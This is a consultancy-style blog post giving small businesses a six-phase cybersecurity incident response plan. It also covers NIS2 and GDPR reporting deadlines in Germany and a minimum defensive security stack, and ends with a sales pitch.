74% of SMBs Handle Cybersecurity Themselves. That’s the Problem.
Three out of four small business owners manage their own cybersecurity. Or hand it to an untrained family member. Or just hope for the best.
Only 14% have a formal cybersecurity plan. Only 29% rate their defenses as mature. And 55% say a cyberattack costing less than EUR 50,000 would threaten their business.
Those numbers should terrify you. Germany is Europe’s number one target for cyberattacks.
NIS2 now extends cybersecurity obligations to 29,000 organizations. Even if you’re not directly in scope, your clients and partners increasingly expect you to have your act together.
This guide gives you a practical incident response plan. Not a 100-page document nobody reads. A framework your actual team can execute when things go wrong.
Why SMBs Are the Target
Attackers don’t target SMBs because they’re valuable. They target them because they’re easy.
Large enterprises have SOC teams, endpoint detection, network monitoring, and dedicated incident response playbooks. SMBs have a shared admin password and antivirus software from 2022. The attack surface difference is enormous.
Ransomware gangs have shifted focus to the mid-market precisely because the payoff-to-effort ratio is better. A hospital with 200 beds will pay EUR 50,000 to get their systems back. An enterprise with a backup strategy and an incident response team won’t.
The average cost of a data breach for organizations under 500 employees was USD 3.31 million in 2024. Not pocket change. For most SMBs, that’s existential.
The Incident Response Framework
Six phases. Simple enough to remember. Detailed enough to actually work.
Phase 1: Preparation (do this now)
This is the only phase you do before an incident. Everything else happens during and after.
Identify your critical systems. What would shut down your business if it went offline? Customer database, email, accounting system, production systems, website. Rank them. This is your recovery priority list.
Define roles. Who makes decisions during an incident? Who communicates with customers? Who handles technical response? You don’t need a 10-person team. You need three people who know their role: an incident lead (usually the CEO or CTO for SMBs), a technical responder, and a communications point person.
Set up offline contacts. If your email server is compromised, how do you reach your team? Personal phone numbers, a Signal group, a secondary email domain. Write it down. Print it out. Put it somewhere accessible that isn’t your primary IT system.
Configure basic monitoring. You can’t respond to what you can’t see. At minimum: centralized logging for authentication events, alerts for failed login patterns, monitoring for unusual data access. Cloud providers offer these tools. Turn them on.
Get your NIS2 ducks in a row. If you’re in scope, you’re required to report significant incidents to the BSI within 24 hours. Know the process. Know the portal. Don’t figure this out during a crisis. Our NIS2 compliance guide walks through the full requirements.
Phase 2: Identification
Something looks wrong. An employee reports a phishing email. Your monitoring flags unusual login activity. A client says they received a strange email from your domain. Now what?
Verify the incident. Not every alert is an incident. Check for false positives. But err on the side of treating suspicious activity seriously. Better to investigate a false alarm than to dismiss a real breach.
Classify severity. Is this a single compromised account? A ransomware infection? A data breach? The response scales with severity.
Document from minute one. Timestamp everything. Who noticed what, when. What systems are affected. What data is potentially exposed. This documentation becomes your evidence trail and your regulatory report.
Phase 3: Containment
Stop the bleeding. Limit the damage. Don’t fix anything yet. Just contain.
Short-term containment. Isolate affected systems from the network. Disable compromised accounts. Block malicious IP addresses. If ransomware is spreading, disconnect systems before it reaches your backups.
Critical rule: do not turn off affected systems. Power them down gracefully or disconnect from the network.
Forensic evidence lives in memory. Pulling the plug destroys it.
Long-term containment. If the incident requires extended response, set up a clean environment to continue business operations while the investigation continues. Redirect critical services to backup systems.
Phase 4: Eradication
Find the root cause. Remove it completely.
If the entry point was a phishing email, identify every system the attacker accessed from that initial foothold. If it was an unpatched vulnerability, patch it across every affected system. If it was a compromised credential, reset every credential that the compromised account had access to.
Don’t just fix the symptom. Kill the root cause. Attackers who find one way in usually explore others. Check for persistence mechanisms: scheduled tasks, modified startup scripts, backdoor accounts.
Phase 5: Recovery
Bring systems back. Carefully.
Restore from known-good backups. Verify integrity before reconnecting to the network. Monitor restored systems intensively for the first 48-72 hours. Attackers sometimes leave dormant payloads that activate after recovery.
Prioritize recovery based on your critical systems list from Phase 1. Customer-facing systems first. Internal tools second. Nice-to-haves last.
Phase 6: Lessons learned
Within one week of resolution, hold a blameless post-mortem. What happened? When did you detect it? How long did containment take? What worked? What didn’t?
Turn findings into concrete improvements. If detection took too long, invest in better monitoring.
If containment was chaotic, run a tabletop exercise next quarter. If the root cause was an unpatched system, fix your patch management process.
Document the post-mortem. Share it with the team. This is how you get better.
Regulatory Reporting
Under NIS2 (if you’re in scope), the timeline is rigid:
- Within 24 hours: Initial notification to the BSI. What happened, initial severity assessment, potential cross-border impact.
- Within 72 hours: Comprehensive report. Technical details, impact assessment, mitigation measures taken.
- Within one month: Final report. Root cause analysis, full impact assessment, corrective measures.
Under GDPR (if personal data is affected):
- Within 72 hours: Notify your supervisory authority. In Germany, that’s typically the state data protection authority (Landesdatenschutzbehörde).
- Without undue delay: Notify affected individuals if the breach poses a high risk to their rights and freedoms.
Having the documentation from Phase 2 onward makes these reports dramatically easier to compile. That’s why you document from minute one.
The Minimum Security Stack for SMBs
You don’t need enterprise-grade tools. You need the basics, done right.
Multi-factor authentication on everything. Email, cloud services, admin panels, VPN. Non-negotiable.
Automated patching for operating systems and critical software. If you can’t patch within 30 days, you’re already behind.
Email security with anti-phishing and anti-spoofing (DMARC, DKIM, SPF). Phishing is the number one attack vector for SMBs. Block what you can automatically.
Encrypted backups tested monthly. The 3-2-1 rule: three copies, two different media types, one offsite. Test recovery at least quarterly.
Endpoint protection on every device. Modern EDR (Endpoint Detection and Response) is better than traditional antivirus. CrowdStrike Falcon Go, SentinelOne, and Microsoft Defender for Business are all viable for SMBs.
For the broader compliance context, see our pillar guide on EU compliance for software teams. And if you’re building software that needs to survive audits, our Security by Design guide covers the development side.
Need help building a cybersecurity foundation for your business? Let’s assess your current posture. We’ll identify the gaps and build a practical security roadmap that fits your team and budget.
